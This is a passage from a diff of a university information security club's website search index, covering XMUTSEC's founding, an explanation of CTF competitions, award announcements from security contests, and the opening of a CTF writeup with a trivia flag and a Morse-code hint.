\u5927\u8d5b\u5f3a\u8c03\u4f01\u4e1a\u4e0e\u9ad8\u6821\u7684\u8054\u5408\uff0c\u901a\u8fc7\u6821\u4f01\u5bf9\u63a5\u7684\u4f01\u4e1a\u5bfc\u5e08\u52a0\u5b66\u751f\u6218\u961f\u7684\u6a21\u5f0f\uff0c\u5c06\u4f01\u4e1a\u8d44\u6e90\u7eb3\u5165\u5230\u9ad8\u6821\u7684\u4fe1\u606f\u5b89\u5168\u76f8\u5173\u4e13\u4e1a\u4eba\u624d\u57f9\u517b\u4e2d\uff0c\u5e76\u5b9e\u73b0\u4eba\u624d\u4ece\u9ad8\u6821\u5230\u4f01\u4e1a\u7684\u65e0\u7f1d\u5bf9\u63a5\u3002

\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u4e3a\u4e00\u9879\u5468\u671f\u4e3a\u4e00\u5e74\u7684\u5168\u56fd\u6027\u8054\u8d5b\u8d5b\u4e8b\uff0c\u7531\u591a\u4e2a\u533a\u57df\u5206\u7ad9\u8d5b\u548c\u5e74\u5ea6\u603b\u51b3\u8d5b\u7ec4\u6210\u3002

\u672c\u534f\u4f1a\u7684CodeMonster\u6218\u961f\u8363\u83b7\u7b2c\u4e09\u540d\uff0c\u62ff\u4e0b\u4e09\u7b49\u59565000\u5143\u5956\u91d1\u3002

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/f72cbee7-1294-46b9-92e3-49a3140255b2/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"

\u83b7\u5956\u56fe\u7247\uff1a

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"writeup/CISCN-CTF-Quals-2023/","title":"2023\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u521d\u8d5bWriteup","text":""}]} \ No newline at end of file +{"config":{"lang":["ja"],"separator":"[\\s\\-\uff0c\u3002]+","pipeline":["stemmer"]},"docs":[{"location":"","title":"XMUTSEC","text":"

\u53a6\u95e8\u7406\u5de5\u5927\u5b66\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\uff08XMUTSEC\uff09 - \u6210\u7acb\u4e8e\u4e8c\u3007\u4e00\u516d\u5e74\u9646\u6708\u4e5d\u65e5\u662f\u8ba1\u7b97\u673a\u5b66\u9662\u6307\u5bfc\u4e0b\u7684\u5b66\u672f\u79d1\u6280\u7c7b\u793e\u56e2\uff0c\u51e0\u4f4d\u5fd7\u540c\u9053\u5408\u7684\u5c11\u5e74\u4eba\u5728\u9e6d\u6c5f\u4e4b\u7554\u4e00\u62cd\u5373\u5408\u6210\u7acb\u4e86\u4e00\u652fCTF\u6218\u961fCodeMonster\u4e0e\u4e4b\u540c\u65f6\u8bde\u751f\u7684\u8fd8\u6709\u5723\u540e\u6eaa\u82f1\u5170\u5fb7\u7687\u5bb6\u5e7c\u513f\u56ed\u9644\u5c5e\u7406\u5de5\u5927\u5b66\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\uff08\u53a6\u95e8\u7406\u5de5\u5927\u5b66\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\uff09\uff0c\u534f\u4f1a\u4e3b\u8981\u7814\u7a76\u7684\u65b9\u5411\u4ee5\u5b89\u5168\u7c7b\u4e3a\u4e3b\uff0c\u6b64\u5916\uff0c\u534f\u4f1a\u4e5f\u4f1a\u7ec4\u7ec7\u5b66\u751f\u53c2\u52a0\u5b66\u672f\u7ade\u8d5b\uff0c\u4e3e\u529e\u5b66\u672f\u4ea4\u6d41\u7b49\u7b49\u3002

\u534f\u4f1a\u5b98\u7f51\uff1ahttps://www.xmutsec.cn

"},{"location":"#_1","title":"\u52a0\u5165\u6211\u4eec","text":"

\u52a0\u5165\u6807\u51c6 \uff08\u6ee1\u8db3\u4ee5\u4e0b\u4e24\u4e2a\u6761\u4ef6\u5373\u53ef\uff0c\u5305\u62ec\u54c1\u884c\u7aef\u6b63\uff09 - \u54c1\u884c\u7aef\u6b63

"},{"location":"#_2","title":"\u5b66\u4e60\u65b9\u5f0f","text":""},{"location":"award/","title":"\u8db3\u8ff9","text":""},{"location":"award/#_2","title":"\u8db3\u8ff9","text":""},{"location":"award/#_3","title":"\u4e3b\u529e","text":""},{"location":"award/#2023","title":"2023","text":"

\uff08FUCK U, COVID-19/\ud83d\udc47\uff09

"},{"location":"award/#2022","title":"2022","text":""},{"location":"award/#2021","title":"2021","text":"

\uff08FUCK U, COVID-19/\ud83d\udc46\uff09

"},{"location":"award/#2020","title":"2020","text":""},{"location":"award/#2019","title":"2019","text":""},{"location":"award/#2018","title":"2018","text":""},{"location":"award/#2017","title":"2017","text":""},{"location":"award/#2016","title":"2016","text":""},{"location":"member/","title":"\u534f\u4f1a\u6210\u5458","text":""},{"location":"member/#2021-2022","title":"2021-2022","text":""},{"location":"member/#2020-2021","title":"2020-2021","text":""},{"location":"member/#2019-2020","title":"2019-2020","text":""},{"location":"member/#2018-2019","title":"2018-2019","text":""},{"location":"member/#2017-2018","title":"2017-2018","text":""},{"location":"member/#2016-2017","title":"2016-2017","text":""},{"location":"posts/07cb34d3-7c51-43af-bfb2-84425b34c8f4/","title":"2018 \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u5168\u56fd\u603b\u51b3\u8d5b \u4e8c\u7b49\u5956","text":"

\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u57f9\u517b\u53c8\u6709\u4e86\u65b0\u52a8\u5411\u300212\u67087\u65e5\uff0c2017-2018\u5168\u56fd\u9ad8\u6821\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u603b\u51b3\u8d5b\u5728\u5317\u4eac\u822a\u7a7a\u822a\u5929\u5927\u5b66\u76db\u5927\u5f00\u5e55\uff0c\u6765\u81ea\u5168\u56fd57\u6240\u9ad8\u6821\u7684\u7f51\u7edc\u5b89\u5168\u5b9e\u6218\u8d5b\u961f\u5728\u201c\u6570\u636e\u8d5b\u3001\u4f01\u4e1a\u8d5b\u3001\u4e2a\u4eba\u8d5b\u201c\u4e09\u4e2a\u65b9\u5411\u6bd4\u8d5b\u4e2d\u4e00\u51b3\u9ad8\u4e0b\uff0c\u4e3a\u5168\u56fd\u7f51\u7edc\u5b89\u5168\u5e02\u573a\u63d0\u4f9b\u4e86\u65b0\u4e00\u6279\u9ad8\u7aef\u4eba\u624d\u3002

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/0fbc0fc1-39e4-47ee-9cff-ba792b068f27/","title":"\u201c\u767e\u8d8a\u676f\u201d\u7b2c\u4e09\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e00\u7b49\u5956\u3001\u4e09\u7b49\u5956\u3001\u4f18\u80dc\u5956","text":"

\u4e3a\u8d2f\u5f7b\u843d\u5b9e\u4e2d\u592e\u7f51\u4fe1\u529e\u7b49\u516d\u90e8\u95e8\u300a\u5173\u4e8e\u52a0\u5f3a\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u5efa\u8bbe\u548c\u4eba\u624d\u57f9\u517b\u7684\u610f\u89c1\u300b\uff08\u4e2d\u7f51\u529e\u53d1\u6587\u30142016\u30154\u53f7\uff09\u7cbe\u795e\uff0c\u52a0\u5feb\u9ad8\u6821\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u4e13\u4e1a\u5efa\u8bbe\uff0c\u521b\u65b0\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u57f9\u517b\u673a\u5236\uff0c\u7701\u6559\u80b2\u5385\u3001\u7701\u7f51\u5b89\u529e\u51b3\u5b9a\u8054\u5408\u4e3e\u529e\u7b2c\u4e09\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d\u3002

\u672c\u534f\u4f1a\u6d3e\u51fa\u7684\u4e09\u652f\u961f\u4f0d\u5206\u522b\u83b7\u5f97\u4e86\u4e00\u7b49\u5956\u3001\u4e09\u7b49\u5956\u548c\u4f18\u80dc\u5956\uff0c\u5176\u4e2dCodeMonster\u6218\u961f\u5168\u7701\u7b2c\u4e09\u593a\u5f97\u4e00\u7b49\u5956\uff0c\u83b7\u5f972000\u5143\u5956\u91d1\u3002

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/131885e3-191c-40ac-af0d-79835e15d45b/","title":"\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\u6210\u7acb","text":"

\u672c\u534f\u4f1a\u6210\u7acb\u4e8e2016\u5e746\u67089\u65e5\uff0c\u81f4\u529b\u4e8e\u5bf9\u4fe1\u606f\u5b89\u5168\u65b9\u9762\u7684\u63a2\u7d22\u4e0e\u521b\u65b0\uff0c\u65e8\u5728\u4e3a\u6211\u6821\u70ed\u7231\u4fe1\u606f\u5b89\u5168\u7684\u540c\u5b66\u63d0\u4f9b\u4e00\u4e2a\u4ea4\u6d41\u5e73\u53f0\uff0c\u6269\u5927\u4fe1\u606f\u5b89\u5168\u5728\u6211\u6821\u7684\u5f71\u54cd\u529b\u3002

","tags":["\u534f\u4f1a\u6742\u8c08","\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/131885e3-191c-40ac-af0d-79835e15d45b/#_1","title":"\u534f\u4f1a\u6d3b\u52a8","text":"

\u672c\u534f\u4f1a\u901a\u8fc7\u53c2\u52a0CTF\u7ade\u8d5b\u7684\u5f62\u5f0f\u9a8c\u8bc1\u81ea\u5df1\u7684\u4fe1\u606f\u5b89\u5168\u6280\u672f\u6c34\u5e73 \u5404\u4f4d\u5927\u4f6c\u548c\u840c\u65b0\u53ef\u4ee5\u53bb\u534f\u4f1aCodeMonster\u6218\u961f\u4e0e\u96c6\u7f8e\u5927\u5b66\u4fe1\u5b89\u534f\u4f1a\u7684Mokirin\u6218\u961f\u5171\u540c\u642d\u5efa\u7ef4\u62a4\u7684MOCTF\u5e73\u53f0\u8fdb\u884c\u65e5\u5e38CTF\u5237\u9898\u3002

","tags":["\u534f\u4f1a\u6742\u8c08","\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/131885e3-191c-40ac-af0d-79835e15d45b/#ctf","title":"CTF\u4ecb\u7ecd","text":"

CTF\uff08Capture The Flag\uff09\u4e2d\u6587\u4e00\u822c\u8bd1\u4f5c\u593a\u65d7\u8d5b\uff0c\u5728\u7f51\u7edc\u5b89\u5168\u9886\u57df\u4e2d\u6307\u7684\u662f\u7f51\u7edc\u5b89\u5168\u6280\u672f\u4eba\u5458\u4e4b\u95f4\u8fdb\u884c\u6280\u672f\u7ade\u6280\u7684\u4e00\u79cd\u6bd4\u8d5b\u5f62\u5f0f\u3002CTF\u8d77\u6e90\u4e8e1996\u5e74DEFCON\u5168\u7403\u9ed1\u5ba2\u5927\u4f1a\uff0c\u4ee5\u4ee3\u66ff\u4e4b\u524d\u9ed1\u5ba2\u4eec\u901a\u8fc7\u4e92\u76f8\u53d1\u8d77\u771f\u5b9e\u653b\u51fb\u8fdb\u884c\u6280\u672f\u6bd4\u62fc\u7684\u65b9\u5f0f\u3002\u53d1\u5c55\u81f3\u4eca\uff0c\u5df2\u7ecf\u6210\u4e3a\u5168\u7403\u8303\u56f4\u7f51\u7edc\u5b89\u5168\u5708\u6d41\u884c\u7684\u7ade\u8d5b\u5f62\u5f0f\uff0c2013\u5e74\u5168\u7403\u4e3e\u529e\u4e86\u8d85\u8fc7\u4e94\u5341\u573a\u56fd\u9645\u6027CTF\u8d5b\u4e8b\u3002\u800cDEFCON\u4f5c\u4e3aCTF\u8d5b\u5236\u7684\u53d1\u6e90\u5730\uff0cDEFCON CTF\u4e5f\u6210\u4e3a\u4e86\u76ee\u524d\u5168\u7403\u6700\u9ad8\u6280\u672f\u6c34\u5e73\u548c\u5f71\u54cd\u529b\u7684CTF\u7ade\u8d5b\uff0c\u7c7b\u4f3c\u4e8eCTF\u8d5b\u573a\u4e2d\u7684\u201c\u4e16\u754c\u676f\u201d \u3002 CTF\u5927\u81f4\u6d41\u7a0b\u662f\uff0c\u53c2\u8d5b\u56e2\u961f\u4e4b\u95f4\u901a\u8fc7\u8fdb\u884c\u653b\u9632\u5bf9\u6297\u3001\u7a0b\u5e8f\u5206\u6790\u7b49\u5f62\u5f0f\uff0c\u7387\u5148\u4ece\u4e3b\u529e\u65b9\u7ed9\u51fa\u7684\u6bd4\u8d5b\u73af\u5883\u4e2d\u5f97\u5230\u4e00\u4e32\u5177\u6709\u4e00\u5b9a\u683c\u5f0f\u7684\u5b57\u7b26\u4e32\u6216\u5176\u4ed6\u5185\u5bb9\uff0c\u5e76\u5c06

","tags":["\u534f\u4f1a\u6742\u8c08","\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/6d1aa499-57ee-401b-a911-8062c6cae869/","title":"360\u7b2c\u4e8c\u5c4a48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u7b2c\u56db\u540d","text":"

\u5317\u4eac\u65f6\u95f411\u670823\u65e5\uff0c\u7b2c\u4e8c\u5c4a48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u4e8e\u798f\u5dde\u6b63\u5f0f\u5f00\u6218\u3002\u4f5c\u4e3a\u4e00\u9879\u5bf9\u4ea7\u54c1\u5b89\u5168\u4e25\u683c\u8981\u6c42\u3001\u5411\u9ed1\u5ba2\u7cbe\u795e\u6781\u81f4\u8ffd\u9010\u3001\u7ed9\u4e88\u53c2\u8d5b\u9009\u624b\u9ad8\u989d\u5956\u52b1\u7684\u9ed1\u5ba2\u8d5b\u4e8b\uff0c\u672c\u5c4a\u9ed1\u5ba2\u9a6c\u62c9\u677e\u5438\u5f15\u4e86\u6765\u81ea\u5168\u56fd\u8fd110\u652f\u5b66\u751f\u9ed1\u5ba2\u6218\u961f\u53c2\u8d5b\uff0c\u5176\u4e2d\u5305\u62ec\u6765\u81ea\u53f0\u6e7e\u5730\u533a\u7684BambooFox\u548cTDOH\u4e24\u652f\u6218\u961f\u3002

48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u7531360\u5b89\u5168\u5e94\u6025\u54cd\u5e94\u4e2d\u5fc3\u4e3b\u529e\u7684\u9762\u5411360\u516c\u53f8IoT\u8bbe\u5907\u7684\u6f0f\u6d1e\u5956\u52b1\u8d5b\u4e8b\uff0c\u8bbe\u7f6e\u4e8636\u4e07\u4eba\u6c11\u5e01\u5956\u91d1\u6c60\uff0c\u5355\u4e2a\u6f0f\u6d1e\u5956\u52b1\u6700\u9ad8\u53ef\u8fbe5\u4e07\u5143\u3002

\u5c11\u5e74\u90ce\u5251\u8bd5\u5929\u4e0b\n

\u9ed1\u5ba2\u9a6c\u62c9\u677e\u6982\u5ff5\u6e90\u81ea\u7f8e\u56fd\uff0c\u5f53\u4e00\u7fa4\u9ad8\u624b\u4e91\u96c6\u4e00\u5802\uff0c\u4e92\u76f8\u6c9f\u901a\u548c\u5b66\u4e60\uff0c\u8fd9\u5c31\u6210\u4e86\u201d\u4e16\u754c\u4e0a\u6700\u9177\u7684\u6280\u672f\u72c2\u6b22\u201d\u3002\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u8d5b\u91c7\u7528\u4e8648\u5c0f\u65f6\u6781\u9650\u6f0f\u6d1e\u6316\u6398\u548c\u7834\u89e3\u76ee\u6807\u968f\u673a\u9009\u5b9a\u7684\u8d5b\u5236\uff0c\u53c2\u8d5b\u9009\u624b\u9700\u8981\u5728\u6bd4\u8d5b\u671f\u95f4\u8fde\u7eed\u4e0d\u4e2d\u65ad\u5730\u5bf9\u7279\u5b9a\u4ea7\u54c1\u8fdb\u884c\u6f0f\u6d1e\u6316\u6398\uff0c\u6bcf\u961f\u53ea\u914d\u5907\u4e00\u95f4\u4f11\u606f\u5ba4\u4ee5\u4f9b\u9009\u624b\u201c\u56de\u8840\u201d\u3002\u5728\u8fd9\u6837\u77ed\u7684\u65f6\u95f4\u5185\u5bfb\u627e\u7531\u5b89\u5168\u4eba\u5458\u53cd\u590d\u628a\u5173\u7684\u4ea7\u54c1\u6f0f\u6d1e\uff0c\u5e76\u975e\u6613\u4e8b\u3002\u4e0d\u8fc7\uff0c\u6ca1\u6709\u7edd\u5bf9\u5b89\u5168\u7684\u7cfb\u7edf\uff0c\u6211\u4eec\u4e5f\u5728\u671f\u5f85\u7740\u4ed6\u4eec\u7684\u7cbe\u5f69\u8868\u73b0\uff0c\u4e3a\u63d0\u5347360\u4ea7\u54c1\u5b89\u5168\u6027\u800c\u5927\u5c55\u8eab\u624b\uff01

\u9ed1\u4e0d\u662f\u76ee\u7684\uff0c\u5b89\u5168\u624d\u662f\u738b\u9053\n

360\u96c6\u56e2\u4f5c\u4e3a\u4e2d\u56fd\u9886\u5148\u7684\u4e92\u8054\u7f51\u7edc\u5b89\u5168\u4f01\u4e1a\uff0c\u6c47\u805a\u4e86\u56fd\u5185\u89c4\u6a21\u9886\u5148\u7684\u9ad8\u6c34\u5e73\u5b89\u5168\u6280\u672f\u56e2\u961f\uff0c\u79ef\u7d2f\u4e86\u63a5\u8fd1\u4e07\u4ef6\u539f\u521b\u6280\u672f\u548c\u6838\u5fc3\u6280\u672f\u7684\u4e13\u5229\uff0c\u5e76\u5728\u6b64\u57fa\u7840\u4e0a\u5f00\u53d1\u51fa\u62e5\u6709\u6570\u4ebf\u7528\u6237\u7684360\u5b89\u5168\u536b\u58eb\u3001360\u624b\u673a\u536b\u58eb\u7b49\u5b89\u5168\u4ea7\u54c1\uff0c\u540c\u65f6\u4e3a\u4e0a\u767e\u4e07\u5bb6\u56fd\u5bb6\u673a\u5173\u548c\u4f01\u4e8b\u4e1a\u5355\u4f4d\u63d0\u4f9b\u5305\u62ec\u5b89\u5168\u54a8\u8be2\u3001\u5b89\u5168\u8fd0\u7ef4\u3001\u5b89\u5168\u57f9\u8bad\u7b49\u5168\u65b9\u4f4d\u5b89\u5168\u670d\u52a1\u3002

\u6000\u63e3\u7528\u6237\u5b89\u5168\u7b2c\u4e00\u7684\u76ee\u7684\u548c\u51b3\u5fc3\uff0c48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u9080\u8bf7\u5230\u9ad8\u6821\u5b66\u751f\u5bf9\u6307\u5b9a\u4ea7\u54c1\u8fdb\u884c\u5168\u9762\u6f0f\u6d1e\u6316\u6398\uff0c\u8003\u9a8c\u7684\u4e0d\u4ec5\u4ec5\u662f\u4e66\u672c\u4e0a\u7684\u77e5\u8bc6\uff0c\u8fd8\u6709\u4e2a\u4eba\u7684\u6280\u672f\u5b9e\u529b\u4e0e\u56e2\u961f\u7684\u534f\u540c\u914d\u5408\u3002\u6bd4\u8d5b\u4e00\u65b9\u9762\u53ef\u4ee5\u63d0\u5347360\u4ea7\u54c1\u7684\u5b89\u5168\u6027\uff0c\u53e6\u4e00\u65b9\u9762\u5219\u80fd\u4fc3\u8fdb\u65b0\u751f\u4ee3\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u7684\u4ea4\u6d41\uff0c\u63d0\u9ad8\u7f51\u7edc\u5b89\u5168\u4ece\u4e1a\u8005\u7684\u6280\u672f\u6c34\u5e73\uff0c\u5171\u540c\u6253\u9020\u66f4\u5b89\u5168\u7684\u7f51\u7edc\u73af\u5883\u3002

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/6eba13d5-1e74-4680-8a10-9c18763b6389/","title":"\u4e3e\u529e\u7b2c\u4e00\u5c4a\u53a6\u95e8\u7406\u5de5\u201c\u56fd\u79d1\u676f\u201d\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b","text":"

\u4e3a\u5e2e\u52a9\u5b66\u751f\u66f4\u597d\u5730\u611f\u77e5\u3001\u4e86\u89e3\u8eab\u8fb9\u7684\u7f51\u7edc\u5b89\u5168\u98ce\u9669\uff0c\u589e\u5f3a\u7f51\u7edc\u5b89\u5168\u610f\u8bc6\uff0c\u666e\u53ca\u7f51\u7edc\u5b89\u5168\u77e5\u8bc6\uff0c\u63d0\u9ad8\u7f51\u7edc\u5b89\u5168\u9632\u62a4\u6280\u80fd\uff0c\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u8ba1\u7b97\u673a\u4e0e\u4fe1\u606f\u5de5\u7a0b\u5b66\u9662\u7279\u6b64\u4e3e\u529e\u201c\u56fd\u79d1\u676f\u201d\u7b2c\u4e00\u5c4a\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b\uff0c\u4ee5\u6b64\u6380\u8d77\u5b66\u751f\u201c\u5171\u5efa\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u3001\u5171\u4eab\u7f51\u7edc\u6587\u660e\u5b66\u6821\u201d\u7684\u70ed\u6f6e\u3002

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/6eba13d5-1e74-4680-8a10-9c18763b6389/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"

\u6bd4\u8d5b\u6d77\u62a5\uff1a

\u6bd4\u8d5b\u73b0\u573a\uff1a

\u6bd4\u8d5b\u6392\u884c\u699c\uff1a

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/72c8b299-29e5-4e88-a684-7c65b3931760/","title":"\u201c\u767e\u8d8a\u676f\u201d\u7b2c\u4e8c\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e8c\u7b49\u5956\u3001\u4e09\u7b49\u5956\u3001\u4f18\u80dc\u5956","text":"

\u4e3a\u8d2f\u5f7b\u843d\u5b9e\u4e2d\u592e\u7f51\u4fe1\u529e\u7b49\u516d\u90e8\u95e8\u300a\u5173\u4e8e\u52a0\u5f3a\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u5efa\u8bbe\u548c\u4eba\u624d\u57f9\u517b\u7684\u610f\u89c1\u300b\uff08\u4e2d\u7f51\u529e\u53d1\u6587\u30142016\u30154\u53f7\uff09\u7cbe\u795e\uff0c\u52a0\u5feb\u9ad8\u6821\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u4e13\u4e1a\u5efa\u8bbe\uff0c\u521b\u65b0\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u57f9\u517b\u673a\u5236\uff0c\u7701\u6559\u80b2\u5385\u3001\u7701\u7f51\u5b89\u529e\u51b3\u5b9a\u8054\u5408\u4e3e\u529e\u7b2c\u4e8c\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d\u3002

\u672c\u534f\u4f1a\u6d3e\u51fa\u7684\u4e09\u652f\u961f\u4f0d\u5206\u522b\u83b7\u5f97\u4e86\u4e8c\u7b49\u5956\u3001\u4e09\u7b49\u5956\u548c\u4f18\u80dc\u5956\uff0c\u5176\u4e2dCodeMonster\u6218\u961f\u5168\u7701\u7b2c\u516d\u593a\u5f97\u4e8c\u7b49\u5956\uff0c\u83b7\u5f972000\u5143\u5956\u91d1\u3002

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/72c8b299-29e5-4e88-a684-7c65b3931760/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"

\u6bd4\u8d5b\u73b0\u573a\uff1a

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/72c8b299-29e5-4e88-a684-7c65b3931760/#_2","title":"\u6bd4\u8d5b\u89c6\u9891","text":"

\u6bd4\u8d5b\u89c6\u9891\uff1a

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/86e69101-77f4-484a-ba0e-2957afabbdb6/","title":"2018 \u5b89\u6052\u201c\u897f\u6e56\u8bba\u5251\u676f\u201d\u5168\u56fd\u5927\u5b66\u751f\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u6280\u80fd\u5927\u8d5b \u4e2a\u4eba\u8d5b\u4e09\u7b49\u5956","text":"

\u7531\u56fd\u5bb6\u4e92\u8054\u7f51\u4fe1\u606f\u529e\u516c\u5ba4\u7f51\u7edc\u5b89\u5168\u534f\u8c03\u5c40\u3001\u516c\u5b89\u90e8\u7f51\u7edc\u5b89\u5168\u4fdd\u536b\u5c40\u6307\u5bfc\uff0c\u6d59\u6c5f\u7701\u4e92\u8054\u7f51\u4fe1\u606f\u529e\u516c\u5ba4\u3001\u6d59\u6c5f\u7701\u516c\u5b89\u5385\u3001\u676d\u5dde\u5e02\u4eba\u6c11\u653f\u5e9c\u4e3b\u529e\uff0c\u676d\u5dde\u5e02\u7ecf\u6d4e\u548c\u4fe1\u606f\u5316\u59d4\u5458\u4f1a\u3001\u676d\u5dde\u5e02\u8427\u5c71\u533a\u4eba\u6c11\u653f\u5e9c\u3001\u676d\u5dde\u5b89\u6052\u4fe1\u606f\u6280\u672f\u80a1\u4efd\u6709\u9650\u516c\u53f8\u627f\u529e\uff0c\u676d\u5dde\u5e02\u6ee8\u6c5f\u533a\u4eba\u6c11\u653f\u5e9c\u3001\u4e2d\u56fd\u4fe1\u606f\u5b89\u5168\u6d4b\u8bc4\u4e2d\u5fc3\u3001\u56fd\u5bb6\u5de5\u4e1a\u4fe1\u606f\u5b89\u5168\u53d1\u5c55\u7814\u7a76\u4e2d\u5fc3\u3001\u56fd\u5bb6\u8ba1\u7b97\u673a\u7f51\u7edc\u5e94\u6025\u6280\u672f\u5904\u7406\u534f\u8c03\u4e2d\u5fc3\u3001\u963f\u91cc\u4e91\u8ba1\u7b97\u6709\u9650\u516c\u53f8\u3001\u676d\u5dde\u6d77\u5eb7\u5a01\u89c6\u6570\u5b57\u6280\u672f\u80a1\u4efd\u6709\u9650\u516c\u53f8\u3001\u6d59\u6c5f\u5927\u534e\u6280\u672f\u80a1\u4efd\u6709\u9650\u516c\u53f8\u8054\u5408\u627f\u529e\u7684\u897f\u6e56\u8bba\u5251\u2022\u7f51\u7edc\u5b89\u5168\u5927\u4f1a\u5b9a\u6863\u4eca\u5e744\u670827\u65e5\uff0c\u897f\u6e56\u8bba\u5251\u676f\u5168\u56fd\u5927\u5b66\u751f\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u6280\u80fd\u5927\u8d5b \u4f5c\u4e3a\u672c\u6b21\u8bba\u575b\u4e2d\u6700\u53d7\u77a9\u76ee\u7684\u90e8\u5206\u4e4b\u4e00\uff0c\u4e5f\u5c06\u4e8e4\u670826\u65e5\u5f00\u542f\u3002

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/9806f2d8-b4ad-48d3-ad34-5481b1e8e35b/","title":"2018 \u7b2c\u5341\u4e00\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u5927\u8d5b \u4e09\u7b49\u5956\uff08\u534e\u4e1c\u5357\u8d5b\u533a\u7b2c4\u540d\uff09","text":"

\u81ea\u5df1\u53bb\u770b\u5427 http://www.ciscn.cn/home

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/","title":"\u4e3e\u529e2018MOCTF\u65b0\u6625\u6b22\u4e50\u8d5b","text":"

\u4ece\u653e\u5047\u5230\u73b0\u5728\u7b79\u529e\u51c6\u5907\u4e86\u63a5\u8fd1\u4e24\u4e2a\u661f\u671f\u7684MOCTF\u65b0\u6625\u6b22\u4e50\u8d5b\u7ec8\u4e8e\u843d\u5e55\u5566\uff0c\u8fd9\u6b21\u6bd4\u8d5b\u6211\u4e00\u5171\u51fa\u4e861\u7b7e\u5230+1MISC+3WEB\uff0c\u4e0b\u9762\u5148\u653e\u5b98\u65b9WriteUp\uff08\u54c7\u7ec8\u4e8e\u80fd\u5f53\u4e00\u56de\u5b98\u65b9\u4e86\uff09

","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#_1","title":"\u7b7e\u5230","text":"","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#20","title":"\u7b7e\u5230 20","text":"
\u652f\u4ed8\u5b9d\u4eca\u5e74\u96c6\u9f50\u4e94\u798f\u80fd\u4e00\u8d77\u5e73\u5206\u591a\u5c11\u94b1\uff1f\nflag\u683c\u5f0f\uff1amoctf{\u6570\u5b57}\n

flag:moctf{500000000}

","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#misc","title":"MISC","text":"","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#word-100","title":"\u7a7aword 100","text":"
\u771f\u7684\u4ec0\u4e48\u90fd\u6ca1\u6709\u5417\n

\u6587\u4ef6\u662f\u4e2aword \u6253\u5f00\u770b\u53d1\u73b0\u4e00\u4e9b\u5947\u602a\u7684\u6362\u884c\u548ctab \u5f88\u5bb9\u6613\u60f3\u5230\u662f\u6469\u65af\u5bc6\u7801\uff0c\u66ff\u6362\u540e\u5f97\u5230

